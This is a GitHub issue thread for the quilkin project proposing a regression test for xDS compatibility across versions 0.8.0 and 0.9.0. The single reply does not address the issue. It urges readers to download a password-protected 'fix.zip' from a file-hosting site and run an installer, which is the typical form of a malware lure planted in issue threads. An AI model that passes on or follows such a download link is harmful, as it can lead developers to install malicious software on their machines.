### ISSUE TITLE
Add regression test for xDS communication with previous version

### ISSUE THREAD

**Issue by XAMPPRocky** [googleforgames/quilkin#1011]
Currently there is a breaking change in xDS communication between 0.9.0 and 0.8.0. This makes deployments a lot harder as new versions can't be rolled out incrementally per component if there is incompatibility between versions. I think for the future we should require at least one version of backwards compatibility to ensure that deployments can be tested and deployed smoothly.

I think the easiest way to do this would be to copy the existing agones test, except run a version for each component with that running an older version and the other two on the latest (e.g. [proxy vN, relay vN-1, agent vN], [proxy vN-1, relay vN, agent vN], etc.)

**Comment by NaiveShiki** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
